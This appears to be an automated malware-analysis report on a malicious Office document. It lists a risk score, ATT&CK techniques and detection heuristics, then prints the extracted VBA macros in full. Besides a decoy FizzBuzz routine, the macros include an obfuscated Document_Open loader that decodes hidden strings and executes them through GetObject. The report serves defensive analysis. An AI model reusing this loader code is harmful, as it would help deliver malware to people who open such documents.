MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
The sample is a malicious Office document containing obfuscated VBA macros. The Document_Open macro, triggered automatically, uses GetObject to execute a payload. The script attempts to decode a string from ActiveDocument.Variables("t7c834968a72ffc").Value, which is then used to create and execute a second-stage payload. This indicates a macro-based downloader designed to execute arbitrary code.
Heuristics 7
-
ClamAV: Doc.Malware.Sagent-7052597-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-7052597-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1550 bytes |
SHA-256: cf6bfccbcf3f35b53ef2021856f0a24e2abc0564272c1fe472dc3fa3c7eeb453 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub FizzBuzz()
Dim i As Integer
Dim num As Integer
For i = 2 To 100
num = Cells(i, 1).Value
If (num Mod 3 = 0 And num Mod 5 = 0) Then
Cells(i, 2).Value = "Fizzbuzz"
ElseIf (num Mod 3 = 0) Then
Cells(i, 2).Value = "Fizz"
ElseIf (num Mod 5 = 0) Then
Cells(i, 2).Value = "Buzz"
End If
Next i
End Sub
Sub Document_Open()
Call yc84ac647
End Sub
Private Sub yc84ac647()
Dim ecd4d627caefff As Variant: ecd4d627caefff = Split(ActiveDocument.Variables("t7c834968a72ffc").Value, ",")
Dim bf9ddf9f688e6 As Long: Dim q88eda4a4df27 As Long
For bf9ddf9f688e6 = 0 To 1 Step 1
For q88eda4a4df27 = 1 To Len(ecd4d627caefff(bf9ddf9f688e6)) Step 2: Mid(ecd4d627caefff(bf9ddf9f688e6), q88eda4a4df27, 2) = Chr(CInt(Chr(Int(0 + 6 + 4 - 12 + Int(7 / 1) - 12 + Int(9 / 7) + Int(9 / 3) - 5 + Int(9 / 5) + 45)) & Chr(Int(0 - 9 + Int(12 / 6) - 10 - 9 + Int(10 / 9) + 9 + 88)) & Mid(ecd4d627caefff(bf9ddf9f688e6), q88eda4a4df27, 2)) - 99) & "!": Next q88eda4a4df27
ecd4d627caefff(bf9ddf9f688e6) = Replace(ecd4d627caefff(bf9ddf9f688e6), "!", "")
Next bf9ddf9f688e6
GetObject(ecd4d627caefff(1)).Create ecd4d627caefff(0), Null, Null, Null
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.